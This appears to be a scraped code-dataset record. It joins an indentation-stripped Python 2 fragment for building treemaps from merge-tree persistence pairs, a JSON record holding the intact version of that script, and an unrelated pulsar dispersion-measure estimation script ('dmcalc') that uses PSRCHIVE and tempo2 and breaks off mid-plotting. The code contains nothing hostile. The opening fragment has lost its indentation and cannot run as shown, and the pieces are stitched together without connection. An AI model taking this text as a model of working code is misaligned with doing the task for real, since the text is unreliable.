treemap_container = {}
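	# each persistence pair becomes one treemap cell; a cell is nested inside the
	# closest ancestor whose (preorder, pair.preorder) range contains this node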
def find_treemap_parent(node):
if node.preorder not in processed_nodes:
parent_node = node.parent
paired_node = node.pair
parent_found = False
			# keep going up the merge tree till we find an ancestor whose
			# (preorder, pair.preorder) range contains this node
while((parent_node != None) and (parent_found == False)):
if parent_node.preorder < node.preorder < parent_node.pair.preorder:
parent_found = True
else:
parent_node = parent_node.parent
if not parent_found:
treemap_container[node.preorder] = str(node.preorder)
treemap_parent[node] = None
treemap_parent[node.pair] = node
else:
treemap_container[node.preorder] = treemap_container[parent_node.preorder] + "." + str(node.preorder)
treemap_parent[node.pair] = node
treemap_parent[node] = parent_node
treemap_string[node.preorder] = treemap_container[node.preorder] + "." + str(node.preorder)
treemap_string[node.pair.preorder] = treemap_container[node.preorder] + "." + str(node.pair.preorder)
treemap_value[node.pair.preorder] = node.pair.label
treemap_value[node.preorder] = node.label
processed_nodes[node.preorder] = True
processed_nodes[node.pair.preorder] = True
def get_tree_structure(node):
if(node == None):
return
else:
find_treemap_parent(node)
for child in node.children:
get_tree_structure(child)
get_tree_structure(node)
for key in treemap_container.keys():
print str(treemap_container[key]) + ","
for key in treemap_string.keys():
print str(treemap_string[key]) + ","+ str(int((treemap_value[key]+0.05)*1000))
def print_label(node):
print str(node.preorder) + " [label=\""+ str(node.preorder) + " \\n["+ str(node.pair.preorder) + "]"+"\"]"
def print_edge(node):
print str(node.parent.preorder) + "->" + str(node.preorder)
def print_tree_dot(node):
if(node == None):
return
else:
print_label(node)
for child in node.children:
print_edge(child)
print_tree_dot(child)
def make_tree(name, path):
global file_name, file_path
file_name = name
file_path = path
root = get_merge_tree()
get_persistent_pairs()
tree = initialize_tree(root)
traverse(root, tree)
add_pairs(tree)
postorder(tree)
preorder(tree)
#write_tree(tree)
print_treemap(tree)
#print "digraph {"
#print_tree_dot(tree)
#print "}"
|
normal
|
{
"blob_id": "4daab8b8db1e394e3132ab5550fe0236b67074d8",
"index": 5527,
"step-1": "from helper import *\n\ntree_type = TREE_TYPE_SPLIT\n\nfile_name = ''\nfile_path = ''\n\nsplit_scalars = {}\nvisited = {}\nadjacency = {}\npairs = {}\n\nindex_map = {}\npostorder_map = {}\npreorder_map = {}\n\nbirth = {}\ndeath = {}\n\nstring = ''\n\nclass Tree(object):\n\tdef __init__(self):\n\t\tself.index = None\n\t\tself.children = []\n\t\tself.parent = None\n\t\tself.label = None\n\t\tself.pair = None\n\t\tself.birth = None\n\t\tself.death = None\n\t\tself.postorder = None\n\t\tself.preorder = None\n\n\tdef __str__(self):\n\t\treturn str(self.index)\n\ndef initialize_tree(index):\n\troot = Tree()\n\troot.index = index\n\troot.label = split_scalars[index]\n\troot.pair = pairs[index]\n\n\t# add mapping to dictionary\n\tindex_map[index] = root\n\n\treturn root\n\ndef add_node(index, parent):\n\tnode = Tree()\n\tnode.index = index\n\tparent.children.append(node)\n\tnode.parent = parent\n\tnode.label = split_scalars[index]\n\tnode.pair = pairs[index]\n\n\t# add mapping to dictionary\n\tindex_map[index] = node\n\n\treturn node\n\n\ndef compare_nodes(a, b):\n\t# try to sort using the split_scalars\n\t# if they are equal, sort using index value\n\tif split_scalars[a] > split_scalars[b]:\n\t\treturn 1\n\telif split_scalars[a] == split_scalars[b]:\n\t\tif a > b:\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn -1\n\telse:\n\t\treturn -1\n\ndef traverse(index, parent):\n\t#print index, split_scalars[index]\n\tvisited[index] = True\n\tadjacency[index].sort(compare_nodes)\n\tfor node in adjacency[index]:\n\t\tif not visited[node]:\n\t\t\tcurrent = add_node(node, parent)\n\t\t\ttraverse(node, current)\n\ndef add_pairs(node):\n\tif(node == None):\n\t\treturn\n\telse:\n\t\tnode.pair = index_map[pairs[node.index]]\n\t\tnode.birth = index_map[birth[node.index]]\n\t\tnode.death = index_map[death[node.index]]\n\t\tfor child in node.children:\n\t\t\tadd_pairs(child)\n\ndef postorder(node):\n\t# python needs a mutable object for updation\n\torder = {'index': 1}\n\n\tdef set_order(node):\n\t\tif(node == None):\n\t\t\treturn\n\t\telse:\n\t\t\tfor child in node.children:\n\t\t\t\tset_order(child)\n\n\t\t\tnode.postorder = order['index']\n\t\t\tpostorder_map[order['index']] = node\n\t\t\torder['index'] += 1\n\n\tset_order(node)\n\ndef preorder(node):\n\t# python needs a mutable object for updation\n\torder = {'index': 1}\n\n\tdef set_order(node):\n\t\tif(node == None):\n\t\t\treturn\n\t\telse:\n\t\t\tnode.preorder = order['index']\n\t\t\tpreorder_map[order['index']] = node\n\t\t\torder['index'] += 1\n\n\t\t\tfor child in node.children:\n\t\t\t\tset_order(child)\n\n\tset_order(node)\n\ndef stringify_tree(node):\n\tglobal string\n\tif(node == None):\n\t\treturn\n\telse:\n\t\tstring += '{'\n\t\tstring += str(node.postorder) + '|'\n\t\tstring += str(node.index) + '|'\n\t\tstring += str(node.label) + '|'\n\t\tstring += str(node.birth.label) + '|'\n\t\tstring += str(node.death.label)\n\n\t\tfor child in node.children:\n\t\t\tstringify_tree(child)\n\n\t\tstring += '}'\n\n\treturn string\n\ndef get_merge_tree():\n\t# Get merge tree path\n\ttree_file_arguments = [tree_type, TREE_INFIX, file_name, CSV_EXTENSION]\n\ttree_file_path = get_output_path(file_path, tree_file_arguments, folder_name = TREES_FOLDER)\n\n\t# Read merge tree file\n\twith open(tree_file_path, 'rb') as csvfile:\n\t\tcsvfile.readline()\n\t\tspamreader = csv.reader(csvfile, delimiter=' ')\n\t\tfor r in spamreader:\n\t\t\trow = r[0].split(',')\n\t\t\tnode1 = int(row[0])\n\t\t\tnode2 = int(row[1])\n\n\t\t\tsplit_scalars[node1] = 
float(row[2])\n\t\t\tsplit_scalars[node2] = float(row[3])\n\n\t\t\tvisited[node1] = False\n\t\t\tvisited[node2] = False\n\n\t\t\tif node1 not in adjacency.keys():\n\t\t\t\tadjacency[node1] = []\n\n\t\t\tif node2 not in adjacency.keys():\n\t\t\t\tadjacency[node2] = []\n\n\t\t\tadjacency[node1].append(node2)\n\t\t\tadjacency[node2].append(node1)\n\n\tfor i in adjacency.keys():\n\t\tif len(adjacency[i]) == 1:\n\t\t\tif (split_scalars[i] < split_scalars[adjacency[i][0]]):\n\t\t\t\troot = i\n\n\treturn root\n\ndef get_persistent_pairs():\n\t# Get persistence pairs\n\tpairs_file_arguments = [tree_type, PAIRS_INFIX, file_name, CSV_EXTENSION]\n\tpairs_file_path = get_output_path(file_path, pairs_file_arguments, folder_name = PAIRS_FOLDER)\n\n\twith open(pairs_file_path, 'rb') as persistence_pairs:\n\t\tpersistence_pairs.readline()\n\t\tspamreader = csv.reader(persistence_pairs, delimiter=' ')\n\t\tfor r in spamreader:\n\t\t\trow = r[0].split(',')\n\t\t\tnode1 = int(row[0])\n\t\t\tnode2 = int(row[1])\n\n\t\t\t#if (node1 in split_scalars.keys()) and (node2 in split_scalars.keys()):\n\t\t\t# there will be pairs that do not exist in the merge tree\n\t\t\t# they will be removed/ignored subsequently\n\n\t\t\tpairs[node1] = node2\n\t\t\tpairs[node2] = node1\n\n\t\t\t# add birth and death values of nodes to dictionaries\n\t\t\tbirth[node1] = node1\n\t\t\tdeath[node1] = node2\n\n\t\t\tbirth[node2] = node1\n\t\t\tdeath[node2] = node2\n\ndef write_tree(node):\n\ttuple_file_arguments = [file_name, TXT_EXTENSION]\n\ttuple_file_path = get_output_path(file_path, tuple_file_arguments, folder_name = TUPLES_FOLDER)\n\n\ttuple_file = open(tuple_file_path, 'w')\n\tfieldnames = ['timestep', 'postorder', 'value', 'birth', 'death']\n\n\twriter = csv.writer(tuple_file, delimiter=',')\n\twriter.writerow(fieldnames)\n\n\tdef pretty_print_tree(node):\n\t\tif(node == None):\n\t\t\treturn\n\t\telse:\n\t\t\ttimestep = file_name.split('tv_')[1]\n\t\t\tvalues = [timestep, node.postorder, node.label, node.birth.label, node.death.label]\n\t\t\twriter.writerow(values)\n\n\t\t\tfor child in node.children:\n\t\t\t\tpretty_print_tree(child)\n\n\tpretty_print_tree(node)\n\ndef print_treemap(node):\n\tprocessed_nodes = {}\n\ttreemap_string = {}\n\ttreemap_value = {}\n\ttreemap_parent = {}\n\ttreemap_container = {}\n\n\tdef find_treemap_parent(node):\n\t\tif node.preorder not in processed_nodes:\n\t\t\tparent_node = node.parent\n\t\t\tpaired_node = node.pair\n\t\t\tparent_found = False\n\n\t\t\t# keep going up the merge tree till you find a parent that itself and its pair within the range\n\t\t\twhile((parent_node != None) and (parent_found == False)):\n\t\t\t\tif parent_node.preorder < node.preorder < parent_node.pair.preorder:\n\t\t\t\t\tparent_found = True\n\t\t\t\telse:\n\t\t\t\t\tparent_node = parent_node.parent\n\n\t\t\tif not parent_found:\n\t\t\t\ttreemap_container[node.preorder] = str(node.preorder)\n\t\t\t\ttreemap_parent[node] = None\n\t\t\t\ttreemap_parent[node.pair] = node\n\t\t\telse:\n\t\t\t\ttreemap_container[node.preorder] = treemap_container[parent_node.preorder] + \".\" + str(node.preorder)\n\t\t\t\ttreemap_parent[node.pair] = node\n\t\t\t\ttreemap_parent[node] = parent_node\n\n\t\t\ttreemap_string[node.preorder] = treemap_container[node.preorder] + \".\" + str(node.preorder)\n\t\t\ttreemap_string[node.pair.preorder] = treemap_container[node.preorder] + \".\" + str(node.pair.preorder)\n\n\t\t\ttreemap_value[node.pair.preorder] = node.pair.label\n\t\t\ttreemap_value[node.preorder] = 
node.label\n\n\t\t\tprocessed_nodes[node.preorder] = True\n\t\t\tprocessed_nodes[node.pair.preorder] = True\n\n\tdef get_tree_structure(node):\n\t\tif(node == None):\n\t\t\treturn\n\t\telse:\n\t\t\tfind_treemap_parent(node)\n\t\t\tfor child in node.children:\n\t\t\t\tget_tree_structure(child)\n\n\tget_tree_structure(node)\n\tfor key in treemap_container.keys():\n\t\tprint str(treemap_container[key]) + \",\"\n\n\tfor key in treemap_string.keys():\n\t\tprint str(treemap_string[key]) + \",\"+ str(int((treemap_value[key]+0.05)*1000))\n\ndef print_label(node):\n\tprint str(node.preorder) + \" [label=\\\"\"+ str(node.preorder) + \" \\\\n[\"+ str(node.pair.preorder) + \"]\"+\"\\\"]\"\n\ndef print_edge(node):\n\tprint str(node.parent.preorder) + \"->\" + str(node.preorder)\n\ndef print_tree_dot(node):\n\tif(node == None):\n\t\treturn\n\telse:\n\t\tprint_label(node)\n\t\tfor child in node.children:\n\t\t\tprint_edge(child)\n\t\t\tprint_tree_dot(child)\n\n\ndef make_tree(name, path):\n\tglobal file_name, file_path\n\tfile_name = name\n\tfile_path = path\n\troot = get_merge_tree()\n\tget_persistent_pairs()\n\n\n\ttree = initialize_tree(root)\n\ttraverse(root, tree)\n\tadd_pairs(tree)\n\tpostorder(tree)\n\tpreorder(tree)\n\n\t#write_tree(tree)\n\n\tprint_treemap(tree)\n\n\t#print \"digraph {\"\n\t#print_tree_dot(tree)\n\t#print \"}\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/python
'''
** dmcalc **
Estimates the Dispersion Measure (DM) from the data in psrfits file format.
Returns the DM value with its uncertainty and reduced chi-square from tempo2
DM fit.
Dependencies
-------------
PSRCHIVE with python interface: http://psrchive.sourceforge.net/
TEMPO2: https://bitbucket.org/psrsoft/tempo2
SKLEARN: https://scikit-learn.org/stable/install.html
Parameters
----------
file(s) : Input file(s) in psrfits format
ephem : Ephemeris (or parameter) file of the pulsar. This is required
to update the model. It can be given as a command line argument.
If it is available in "PWD/ephemerides" folder, one can use that.
Giving the file with this option overrides the default one.
model : Template profile for cross-correlating with the observation to
obtain DM. It can be given as a command line argument, otherwise
            it will look for a matching one in "PWD/templates" directory
and if found, will use that instead. One can use this option to
override the default selection.
fscrunch  : int, optional, default: 1. Factor for scrunching the frequency
            channels before passing it to DM estimation.
b3fscrunch : int, optional, default: 1. Factor for scrunching the BAND3
            data of uGMRT before passing it to DM estimation.
b5fscrunch : int, optional, default: 1. Factor for scrunching the BAND5
            data of uGMRT before passing it to DM estimation.
offset    : float, optional, default: 0.670520675. Fix for the jump between
            BAND3 and BAND5 of uGMRT data.
writeout : bool, optional, default: False. Writes out the file corrected
for DM in a default directory (PWD/PSRJ_{site}_final), using the
following options to reduce the file.
plot : bool, optional, default: True. Prints the data analysis plot in
a PDF file. ToA rejection steps and DM corrected ToAs are shown
in addition to DM corrected frequency evolution of the profile.
ptoa      : bool, optional, default: False. Prints the outlier-cleaned ToAs
to a file in the TEMPO2 readable format, so that, if required,
it can be used for other purposes.
Fscrunch : bool, optional, default: False. Collapse all frequency channels
to produce one profile.
Tscrunch : bool, optional, default: False. Collapse all sub-integrations
to produce one profile.
tscrunch  : int, optional, default: 1. Factor to scrunch sub-integrations
for writing out the DM corrected file.
quiet     : bool, optional, default: False. Suppresses all print statements
except warnings and errors.
Returns
-------
Dispersion Measure with uncertainty.
Examples
--------
# (a) for DM estimation with files in default directories:
#
dmcalc.py inputfile.fits
#
# (b) to use different ephemeris and template files:
#
dmcalc.py -E ephemeris.par -M model.fits data_file.fits
#
# (c) to write the DM corrected fits file and ToAs:
#
dmcalc.py -w -ptoa inputfile.fits
'''
# import modules...
import os
import sys
import numpy as np
import psrchive
import argparse
import time
import warnings
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import gridspec
start = time.time()
parser = argparse.ArgumentParser(description='Code for measuring in-band '+
'DM for pulsar data in psrfits format.')
parser.add_argument('files', nargs='+', type=str,
help='The list of fits file(s) for processing')
parser.add_argument('-E', '--ephem', type=str,
help='Ephemeris file to update the model. Exits if not '+
'given or is not available in "PWD/ephemerides" '+
'directory')
parser.add_argument('-M', '--model', nargs='+', type=str,
help='Model template for ToA generation. Exits if not '+
'given or is not available in "PWD/templates" '+
'directory')
parser.add_argument('-f','--fscrunch', type=int, default=1,
help='Factor to scrunch the number of channels for '+
'doing DM estimation (Def: 1)')
parser.add_argument('-b3f','--b3fscrunch', type=int, default=1,
help='Factor to scrunch the number of channels for '+
'band3 GMRT data (Def: 1)')
parser.add_argument('-b5f','--b5fscrunch', type=int, default=1,
help='Factor to scrunch the number of channels for '+
'band5 GMRT data (Def: 1)')
parser.add_argument('-w','--writeout', action='store_true',
help='Writes out the DM corrected file. Def: False')
parser.add_argument('-ptoa','--print_toas', action='store_true',
help='Print the prefit ToAs to file in tempo2 format. '+
'Def: False')
parser.add_argument('-F','--Fscrunch', action='store_true',
help='Fully scrunch the number of channels for the '+
'final output archive (Def: False)')
parser.add_argument('-T','--Tscrunch', action='store_true',
help='Completely time scrunch all the integrations')
parser.add_argument('-t','--tscrunch', type=int, default=1,
help='Factor to scrunch the number of integrations for '+
					'the final output archive (Def: 1)')
parser.add_argument('-o','--offset', type=float, default=0.670520675,
help='Offset to shift band 5 ToAs (in secs)')
parser.add_argument('-q', '--quiet', action='store_true',
help='Only print warnings')
def main():
# parses the input arguments
args = parser.parse_args()
# checks status of quiet and ptoa
quiet=False
if args.quiet:
quiet=True
tempo2=True
ptoa=False
if args.print_toas:
ptoa=True
if not quiet:
print("Loading the archive files for DM estimation")
# loads the psrfits file
archives = []
for filename in args.files:
archives.append(psrchive.Archive_load(filename))
narch = len(archives)
if narch >= 1:
if not quiet:
print("Appending the archives ..."),
# append data
ar = freq_appendData(narch, archives, args.offset,
args.b3fscrunch, args.b5fscrunch)
if not quiet:
print(" done!")
else:
if not quiet:
print("Only one archive was given, so nothing to frequency-append.")
# ar is the final archive after performing frequency append
ar = archives[0]
del archives
# extracts relevant information from the archive
ar_psr = ar.get_source()
ar_nbins = ar.get_nbin()
ar_tel = ar.get_telescope()
mjd_start=ar.get_Integration(0).get_start_time().in_days()
mjd_end=ar.get_Integration(0).get_end_time().in_days()
ar_mjd = mjd_start + (mjd_end-mjd_start)/2.
length = ar.integration_length()
ar.update_centre_frequency()
ar_centfr = ar.get_centre_frequency()
ar_nchan = ar.get_nchan()
ar_bw = ar.get_bandwidth()
ar_chnwdth = ar_bw / ar_nchan
ffrac = args.fscrunch
if not quiet:
print("\nNow preparing for DM estimation\n")
pwd=os.getcwd()
# checks for ephemeris file and exit if not given or is not available
# in the default directory "PWD/ephemerides".
if args.ephem != None:
ephemeris = args.ephem
else:
ephemeris = "ephemerides/"+ar_psr+".par"
		if not (os.path.exists(ephemeris)):
			print("Ephemeris file "+ephemeris+" was not found. Exiting.")
			sys.exit(1)
if not quiet:
print ("\nEphemeris file is:"+ephemeris+'\n')
# if template is given as input argument load and process them
	model = []
	if args.model != None:
		for filename in args.model:
			model.append(psrchive.Archive_load(filename))
		if len(args.model) == 1:
			model = freq_appendModel(1,model,args.offset, args.b3fscrunch, args.b5fscrunch)
		if len(args.model) > 1:
			model = freq_appendModel(1,model,args.offset, args.b3fscrunch, args.b5fscrunch)
# If the template is not given, looking for a matching template in the templates directory
if args.model == None:
if not quiet:
print("Looking for matching template in templates directory..."),
import subprocess
tempdir="templates/*.sm"
tempfile=ar_psr+'_tmp.txt'
a=subprocess.call("psredit -c name,nbin,bw,nchan,freq -Q '%s' > '%s'"
% (tempdir,tempfile), shell=True)
tempnchan=""
t1=str(ar_nbins)
if ar_tel=='gmrt':
t2=str(int(ar_bw))
else:
t2=str((ar_bw))
t3=('%.2f'%ar_centfr)
f = open(tempfile,'r')
for line in f:
line = line.strip()
columns=line.split()
t4 = float(columns[5])
t4 = ('%.2f'%t4)
if ar_tel=='gmrt':
if (columns[1]==ar_psr and columns[2]==t1 and str(int(columns[3]))==t2 and t4==t3):
modeltempl=columns[0]
tempnchan=columns[4]
if not quiet:
print (' done\n')
else:
if (columns[1]==ar_psr and columns[2]==t1 and str((columns[3]))==t2 and t4==t3):
modeltempl=columns[0]
tempnchan=columns[4]
if not quiet:
print (' done\n')
if modeltempl=='' and tempnchan=='':
print("\n** No matching template found for DM fitting. Exiting. **\n")
sys.exit(1)
f.close()
os.remove(tempfile)
if not quiet:
print("Found matching template: "+modeltempl)
		model = psrchive.Archive_load(modeltempl)
if not quiet:
print("\nEstimating the DM from the observation")
model.update_centre_frequency()
# cloning the original file for passing to DMCalc() routine
arch = ar.clone()
# Calling the DM estimation routine
dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err = DMCalc(arch, ar_nchan, ar_centfr,
ar_bw, ar_psr, ar_tel, ar_mjd, model,
ephemeris, pwd, ffrac, quiet, tempo2,
ptoa, narch)
# writing out the final DM corrected file, if requested
if args.writeout:
# removing the DM and DMEPOCH from the ephemeris file for uptation
infile = open(ephemeris,"r")
tmpeph = ar_psr+'.eph'
output = open(tmpeph,"w+")
for i, line in enumerate(infile):
if not line.lstrip().startswith('DM'):
if not line.lstrip().startswith('DMEPOCH'):
output.write(line)
infile.close()
output.close()
# updating the ephemeris file with measured DM
dmline = "DM "+str(dmval)+"\t\t"+str(dmverr)
dmepochline = "DMEPOCH "+str(round(ar_mjd,2))
if not args.quiet:
print("Updating the ephemeris with new DM... "),
f = open(tmpeph,'a')
f.write("%s\n %s\n" % (dmline, dmepochline))
if not args.quiet:
print(" done!")
f.close()
# updating the ephemeris in the archive with the measured DM
if not quiet:
print("Correcting the DM of the observed file and writing it out... "),
os.remove(tmpeph)
# creating the directory for writing the file
dirfinal=os.path.join(pwd,ar_psr+"_"+ar_tel+"_final")
if not os.path.exists(dirfinal):
os.makedirs(dirfinal)
# filename with path of the DM corrected file
outfile = dirfinal+"/"+ar_psr + "_" + str(ar_mjd) + "_" + ar_tel + ".ar"
# Setting the DMC flag to 1. In other words, doing the DM correction.
ar.set_dispersion_measure(dmval)
ar.dedisperse()
# Performing different scrunching in the archive for writing out
if not args.Tscrunch:
ar.tscrunch(args.tscrunch)
else:
ar.tscrunch()
if not args.Fscrunch:
ar.fscrunch(ffrac)
else:
ar.fscrunch()
# Writing out the DM corrected, time/frequency scrunched file.
ar.unload(outfile)
if not args.quiet:
print(" done!")
del ar
if not quiet:
print("The file is corrected for DM and is written out to\n"+outfile)
# Printing the results to the file and also in the terminal
f= open(ar_psr+"_DM_timeseries.txt",'a')
f.write('%s %.4f %.6f %.6f %.2f %.4f %.4f %.4f %.2f %.2f %s\n' %( filename, \
ar_mjd, dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err, ar_centfr, \
ar_bw, ar_tel))
f.close()
import time
end = time.time()
total = end - start
print ('-----------------------------------------------------------------------------')
print ('MJD\t\tDM\t\tDMerr\t\tChisq\tC_Fr\tBW\tTel')
print ('%.6f\t%.6f\t%.6f\t%.2f\t%.1f\t%.1f\t%s' % (ar_mjd, dmval, dmverr,
fitchisq, ar_centfr, ar_bw, ar_tel) )
print ('-----------------------------------------------------------------------------')
print("\nThe program took %.1f seconds to finish"%total)
#-------------------------------------------------------------------------------------------#
''' Main function that performs the DM estimation '''
def DMCalc(ar, ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model, ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch):
# Checks if model file is available.
if model == None:
sys.exit(1)
init_dm = ar.get_dispersion_measure()
# setting up the ToA estimation routine using the psrchive ArrivalTime()
if not quiet:
print("Using the ArrivalTime (pat) with PGS in Tempo2 format")
arrtim = psrchive.ArrivalTime()
arrtim.set_shift_estimator('PGS')
arrtim.set_format('Tempo2')
arrtim.set_format_flags('IPTA')
if not quiet:
print("Loading the template file for processing... "),
std = model.clone()
std.pscrunch()
std.tscrunch()
std_nchan = std.get_nchan()
std.dedisperse()
std.fscrunch(ffrac)
arrtim.set_standard(std)
if not quiet:
print(" done!")
ar.fscrunch(ffrac)
ar.pscrunch()
ar.tscrunch()
arrtim.set_observation(ar)
if not quiet:
print("Finding the ToAs... "),
# Finding the ToAs and reading it into numpy arrays
toas = arrtim.get_toas()
toas_filtered = [x.split()[:5] for x in toas]
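	# each Tempo2-format ToA line is: filename, frequency (MHz), MJD, uncertainty (us), site code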
str_filename,str_freq,str_mjd,str_toaErr,str_site = zip(*toas_filtered)
freq = np.asarray(str_freq, dtype=np.float64)
amjd = np.asarray(str_mjd, dtype=np.float64)
terr = np.asarray(str_toaErr, dtype=np.float64)
if not quiet:
print(" done!")
print("Removing the bad ToAs using Huber Regression... "),
# removing the ToAs with zero errors
condition1 = terr < 3*np.median(terr)
freqnew = np.extract(condition1,freq)
amjdnew = np.extract(condition1,amjd)
terrnew = np.extract(condition1,terr)
# writing the ToAs to a temporary file for getting the non-phase resolved ToAs using general2
tempfile = ar_psr+"_tmp.txt"
f = open(tempfile,"w+")
head="FORMAT 1\n"
f.write('%s' % head)
for i in range(0,np.size(freqnew)):
f.write('%s %.12f %.20f %.8f %s\n' %
(str_filename[0], freqnew[i], amjdnew[i], terrnew[i], str_site[0]))
f.close()
tmpstr="tempo2 -output general2 -f"
tmp = os.popen(tmpstr+" %s %s -s \"1111111 {freq} {pre} {err}\n\" | grep '1111111'" %
(ephemeris,tempfile)).read()
os.remove(tempfile)
# extracting the data from general2 output
tmp1 = tmp.split('\n')
freqtmp = np.zeros(np.size(amjdnew))
toastmp = np.zeros(np.size(amjdnew))
TErrtmp = np.zeros(np.size(amjdnew))
for i in range(np.size(amjdnew)):
_,freqtmp[i],toastmp[i],TErrtmp[i] = (tmp1[i].split())
TErrtmp /= 1e+6
# importing libraries for outlier removal
from sklearn import linear_model
from sklearn.linear_model import HuberRegressor
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import make_pipeline
	# reshape the frequency array into a 2-D feature matrix, as expected by sklearn
freqarr = freqtmp.reshape(-1,1)
# making a nu^2 model and fitting using Huber Regression
toastmp *= 1e+6
toashift = (np.min(toastmp)*-1.5)
toastmp += toashift
Terrtmp = TErrtmp*1e+6
model = make_pipeline(PolynomialFeatures(2), HuberRegressor())
model.fit(freqarr,toastmp,
huberregressor__sample_weight=np.ravel(1./Terrtmp))
y_pred = model.predict(freqarr)
residuals = toastmp - y_pred
median = np.median(residuals)
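	# 0.6744897501960817 = inverse normal CDF at 0.75; dividing the MAD by it
	# gives a robust estimate of sigma for Gaussian-distributed residuals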
MAD = np.median(np.abs(residuals-np.median(residuals)))/0.6744897501960817
# filtering the good ToAs
condition2 = (residuals > median - 3*MAD) & (residuals < median + 3*MAD)
freqf = np.around(np.extract(condition2,freqarr),3)
amjdf = np.extract(condition2,amjdnew)
toasf = np.extract(condition2,toastmp)
terrf = np.extract(condition2,TErrtmp)
prefit_rms = np.sqrt(np.cov(toasf, aweights=terrf))
terrf *= 1e+6
if not quiet:
print(" done!")
# writing out the ToAs in proper format
if ptoa:
if not quiet:
print ('Writing out ToAs into a file in tempo2 format'),
dirtoas=os.path.join(pwd,ar_psr+"_"+ar_tel+"_ToAs")
if not os.path.exists(dirtoas):
os.makedirs(dirtoas)
outfile=dirtoas+"/"+ar_psr+"_"+str(ar_mjd)+"_"+ar_tel+"_ToAs.txt"
f = open(outfile,"w+")
head="FORMAT 1"
f.write('%s\n' % head)
for i in range(0,np.size(freqf)):
f.write('%s %.8f %.18f %.6f %s\n' % (str_filename[0], freqf[i], amjdf[i], terrf[i], str_site[0]))
f.close()
if not quiet:
print("done!")
# Fitting the ToAs with tempo2 for DM
if not quiet:
print("\nWriting the ToAs to a temporary file for tempo2 fitting..."),
outfiletmp=ar_psr+"tmp_ToAs.txt"
f = open(outfiletmp,"w+")
head="FORMAT 1"
f.write('%s\n' % head)
for i in range(0,np.size(freqf)):
f.write('%s %.8f %.18f %.6f %s\n' % (str_filename[0], freqf[i], amjdf[i], terrf[i], str_site[0]))
f.close()
if not quiet:
print(" done!\n")
# performing the fit
dmstr=os.popen("tempo2 -f %s %s -nofit -fit dm | grep 'DM (cm^-3 pc)'| awk \'{print $5,$6}\'"
% (ephemeris, outfiletmp)).read()
(dm, dmerr) = dmstr.split()
dmval = float(dm)
dmverr = float(dmerr)
# doing the fit again to read the chisquare
chisqstr=os.popen("tempo2 -f %s %s -nofit -fit dm | grep 'Fit Chisq'| awk \'{print $9}\'"
% (ephemeris, outfiletmp)).read()
fitchisq = float(chisqstr)
os.remove(outfiletmp)
# Preparing the data for plotting the residuals, prefit and postfit
infile = open(ephemeris,"r")
tmpeph1 = ar_psr+'_tmpeph.eph'
output = open(tmpeph1,"w+")
for i, line in enumerate(infile):
if not line.lstrip().startswith('DM'):
if not line.lstrip().startswith('DMEPOCH'):
output.write(line)
infile.close()
output.close()
# updating the ephemeris file with measured DM
dmline = "DM "+str(dmval)+"\t1\t"+str(dmverr)
dmepochline = "DMEPOCH "+str(round(ar_mjd,2))
f = open(tmpeph1,'a')
f.write('%s\n%s\n' % (dmline, dmepochline))
f.close()
newarch = ar.clone()
newarch.tscrunch()
newarch.set_dispersion_measure(dmval)
arrtim.set_observation(newarch)
arrtim.set_standard(std)
toas1 = arrtim.get_toas()
toas1_filtered = [x.split()[:5] for x in toas1]
str_filename1,str_freq1,str_mjd1,str_toaErr1,str_site1 = zip(*toas1_filtered)
freq1 = np.asarray(str_freq1, dtype=np.float64)
amjd1 = np.asarray(str_mjd1, dtype=np.float64)
terr1 = np.asarray(str_toaErr1, dtype=np.float64)
freqnew1 = np.extract(condition1,freq1)
amjdnew1 = np.extract(condition1,amjd1)
terrnew1 = np.extract(condition1,terr1)
tempfile1 = ar_psr+"_tmp1.txt"
f = open(tempfile1,"w+")
head="FORMAT 1\n"
f.write('%s' % head)
for i in range(0,np.size(freqnew1)):
f.write('%s %.12f %.20f %.8f %s\n' % (str_filename1[0], freqnew1[i], amjdnew1[i], terrnew1[i], str_site1[0]))
f.close()
tmp2 = os.popen("tempo2 -output general2 -f %s %s -s \"1111111 {freq} {pre} {err}\n\" | grep '1111111'"
% (tmpeph1,tempfile1)).read()
os.remove(tempfile1)
os.remove(tmpeph1)
# extracting the data from general2 output
tmp3 = tmp2.split('\n')
freqtmp2 = np.zeros(np.size(amjdnew1))
toastmp2 = np.zeros(np.size(amjdnew1))
TErrtmp2 = np.zeros(np.size(amjdnew1))
for i in range(np.size(amjdnew1)):
_,freqtmp2[i],toastmp2[i],TErrtmp2[i] = (tmp3[i].split())
freqf1 = np.around(np.extract(condition2,freqtmp2),3)
amjdf1 = np.extract(condition2,amjdnew1)
toasf1 = np.extract(condition2,toastmp2)
terrf1 = np.extract(condition2,TErrtmp2)
toasf1 *= 1e+6
postfit_rms = np.sqrt(np.cov(toasf1, aweights=terrf1))
ar_nbin = newarch.get_nbin()
ar_nchn = newarch.get_nchan()
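	# frequency limits for plotting: a single archive uses its own band edges,
	# while appended uGMRT band 3 + band 5 data use hard-coded edges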
if (narch == 1):
freq_bot = (ar.get_centre_frequency() - ar_bw/2.0)
freq_top = (ar.get_centre_frequency() + ar_bw/2.0)
if (narch > 1):
if (ar_bw == 200.):
freq_bot = 400.0
freq_top = 1460.0
if (ar_bw == 400.):
freq_bot = 300.0
freq_top = 1460.0
# Getting the profile data for plotting
newarch.dedisperse()
newarch.remove_baseline()
profdata2D = newarch.get_data()[:,0,:,:].flatten().reshape(ar_nchn,ar_nbin)
prof = newarch.clone()
prof.fscrunch()
profdata1D = prof.get_data().flatten()
profdata1D /= np.max(profdata1D)
residDM = init_dm - dmval
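	# cold-plasma dispersion delay (in us) of the residual DM across the band,
	# relative to the lowest ToA frequency: ~4.15e3 * dDM * (f_low^-2 - f^-2),
	# with frequencies in GHz and DM in pc cm^-3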
dmcurve = 4.15 * 1000. * residDM * ( (1./(np.min(freqf)/1000.)**2) - (1./(freqf/1000.)**2) )
dmoff = np.median(toasf) - np.median(dmcurve)
dmcurve += dmoff
# Now does the actual plotting
fig = plt.figure(3, figsize=(8, 6))
fig.subplots_adjust(hspace=0.05)
ax0 = plt.subplot2grid((3, 8), (0,0), rowspan=2, colspan=3)
